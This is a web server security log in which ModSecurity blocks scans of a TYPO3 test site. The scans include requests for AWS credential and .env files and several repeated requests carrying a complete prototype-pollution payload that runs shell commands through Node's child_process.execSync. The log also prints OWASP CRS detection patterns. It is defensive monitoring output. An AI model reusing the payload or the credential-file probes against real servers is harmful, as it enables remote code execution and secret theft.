[Wed Dec 10 17:37:01.427785 2025] [:error] [pid 637201] [client 45.148.10.247:34116] [client 45.148.10.247] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aTmhraNE19-36a8V4yFQ7gAAAAc"]
[Wed Dec 10 17:37:01.428033 2025] [:error] [pid 637201] [client 45.148.10.247:34116] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aTmhraNE19-36a8V4yFQ7gAAAAc"]
[Wed Dec 10 17:37:01.428260 2025] [:error] [pid 637201] [client 45.148.10.247:34116] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aTmhraNE19-36a8V4yFQ7gAAAAc"]
[Wed Dec 10 17:37:04.691336 2025] [authz_core:error] [pid 637201] [client 45.148.10.247:34116] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-config.php.bak
[Wed Dec 10 17:37:16.452668 2025] [authz_core:error] [pid 642280] [client 45.148.10.247:54614] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Wed Dec 10 17:37:17.127231 2025] [authz_core:error] [pid 651741] [client 45.148.10.247:54624] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/storage
[Wed Dec 10 17:37:20.087005 2025] [authz_core:error] [pid 642264] [client 45.148.10.247:60618] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backend
[Wed Dec 10 17:37:25.796720 2025] [authz_core:error] [pid 651743] [client 45.148.10.247:60632] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backend
[Wed Dec 10 17:37:26.475490 2025] [authz_core:error] [pid 637201] [client 45.148.10.247:60652] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backend
[Wed Dec 10 17:37:26.554756 2025] [authz_core:error] [pid 637201] [client 45.148.10.247:60652] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Wed Dec 10 17:37:30.011802 2025] [authz_core:error] [pid 637201] [client 45.148.10.247:60652] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Wed Dec 10 17:37:35.823348 2025] [authz_core:error] [pid 636939] [client 45.148.10.247:56152] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.circleci
[Wed Dec 10 17:37:36.054784 2025] [authz_core:error] [pid 642280] [client 45.148.10.247:56166] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app
[Wed Dec 10 17:37:36.103843 2025] [authz_core:error] [pid 642280] [client 45.148.10.247:56166] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Wed Dec 10 17:37:36.327566 2025] [authz_core:error] [pid 642280] [client 45.148.10.247:56166] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Wed Dec 10 17:37:36.370879 2025] [authz_core:error] [pid 642280] [client 45.148.10.247:56166] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backend
[Wed Dec 10 17:37:36.404257 2025] [authz_core:error] [pid 642280] [client 45.148.10.247:56166] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api
[Wed Dec 10 17:37:36.543641 2025] [authz_core:error] [pid 642280] [client 45.148.10.247:56166] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.travis.yml
[Wed Dec 10 17:37:36.589767 2025] [authz_core:error] [pid 642280] [client 45.148.10.247:56166] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws.yml
[Wed Dec 10 17:37:36.799537 2025] [authz_core:error] [pid 651741] [client 45.148.10.247:56182] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/main.yml
[Wed Dec 10 17:37:37.161399 2025] [:error] [pid 651741] [client 45.148.10.247:56182] [client 45.148.10.247] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aTmh0XT0ILZiIyqzlPhlWQAAAAA"]
[Wed Dec 10 17:37:37.161629 2025] [:error] [pid 651741] [client 45.148.10.247:56182] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aTmh0XT0ILZiIyqzlPhlWQAAAAA"]
[Wed Dec 10 17:37:37.161808 2025] [:error] [pid 651741] [client 45.148.10.247:56182] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aTmh0XT0ILZiIyqzlPhlWQAAAAA"]
[Wed Dec 10 17:37:37.240408 2025] [authz_core:error] [pid 651741] [client 45.148.10.247:56182] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Wed Dec 10 17:37:37.422397 2025] [authz_core:error] [pid 651741] [client 45.148.10.247:56182] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api
[Wed Dec 10 23:51:37.668171 2025] [:error] [pid 657894] [client 34.216.39.231:46194] [client 34.216.39.231] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aTn5eSGe63JXI72lQ57_fQAAAAY"]
[Wed Dec 10 23:51:37.668805 2025] [:error] [pid 657894] [client 34.216.39.231:46194] [client 34.216.39.231] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aTn5eSGe63JXI72lQ57_fQAAAAY"]
[Wed Dec 10 23:51:37.670144 2025] [:error] [pid 657894] [client 34.216.39.231:46194] [client 34.216.39.231] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aTn5eSGe63JXI72lQ57_fQAAAAY"]
[Wed Dec 10 23:51:37.670326 2025] [:error] [pid 657894] [client 34.216.39.231:46194] [client 34.216.39.231] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aTn5eSGe63JXI72lQ57_fQAAAAY"]
[Thu Dec 11 13:07:00.060232 2025] [:error] [pid 664040] [client 44.249.84.217:36178] [client 44.249.84.217] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aTqz5Ef2y7b6ZcvHxt40IAAAAAs"]
[Thu Dec 11 13:07:00.060866 2025] [:error] [pid 664040] [client 44.249.84.217:36178] [client 44.249.84.217] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aTqz5Ef2y7b6ZcvHxt40IAAAAAs"]
[Thu Dec 11 13:07:00.062228 2025] [:error] [pid 664040] [client 44.249.84.217:36178] [client 44.249.84.217] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aTqz5Ef2y7b6ZcvHxt40IAAAAAs"]
[Thu Dec 11 13:07:00.062455 2025] [:error] [pid 664040] [client 44.249.84.217:36178] [client 44.249.84.217] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aTqz5Ef2y7b6ZcvHxt40IAAAAAs"]
[Thu Dec 11 14:01:12.681465 2025] [:error] [pid 664732] [client 34.217.115.101:46894] [client 34.217.115.101] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aTrAmJQEhEGZOAeDW67SUwAAAAk"]
[Thu Dec 11 14:01:12.682201 2025] [:error] [pid 664732] [client 34.217.115.101:46894] [client 34.217.115.101] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aTrAmJQEhEGZOAeDW67SUwAAAAk"]
[Thu Dec 11 14:01:12.683765 2025] [:error] [pid 664732] [client 34.217.115.101:46894] [client 34.217.115.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aTrAmJQEhEGZOAeDW67SUwAAAAk"]
[Thu Dec 11 14:01:12.683993 2025] [:error] [pid 664732] [client 34.217.115.101:46894] [client 34.217.115.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aTrAmJQEhEGZOAeDW67SUwAAAAk"]
[Fri Dec 12 21:33:42.808365 2025] [:error] [pid 682427] [client 34.242.216.38:54222] [client 34.242.216.38] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aTx8Jkj5I9VWsopFNR7qwQAAAAM"]
[Fri Dec 12 21:33:42.809011 2025] [:error] [pid 682427] [client 34.242.216.38:54222] [client 34.242.216.38] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aTx8Jkj5I9VWsopFNR7qwQAAAAM"]
[Fri Dec 12 21:33:42.810337 2025] [:error] [pid 682427] [client 34.242.216.38:54222] [client 34.242.216.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aTx8Jkj5I9VWsopFNR7qwQAAAAM"]
[Fri Dec 12 21:33:42.810547 2025] [:error] [pid 682427] [client 34.242.216.38:54222] [client 34.242.216.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aTx8Jkj5I9VWsopFNR7qwQAAAAM"]
[Fri Dec 12 22:30:43.798196 2025] [:error] [pid 700180] [client 18.201.61.5:53582] [client 18.201.61.5] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aTyJg0e8ubrjJjWu6qBLUAAAAAo"]
[Fri Dec 12 22:30:43.798856 2025] [:error] [pid 700180] [client 18.201.61.5:53582] [client 18.201.61.5] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aTyJg0e8ubrjJjWu6qBLUAAAAAo"]
[Fri Dec 12 22:30:43.800182 2025] [:error] [pid 700180] [client 18.201.61.5:53582] [client 18.201.61.5] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aTyJg0e8ubrjJjWu6qBLUAAAAAo"]
[Fri Dec 12 22:30:43.800377 2025] [:error] [pid 700180] [client 18.201.61.5:53582] [client 18.201.61.5] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aTyJg0e8ubrjJjWu6qBLUAAAAAo"]
[Sat Dec 13 19:27:51.089699 2025] [:error] [pid 714771] [client 204.76.203.25:33178] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aT2wJ8l6s-8p1z6ntod6tAAAAEQ"]
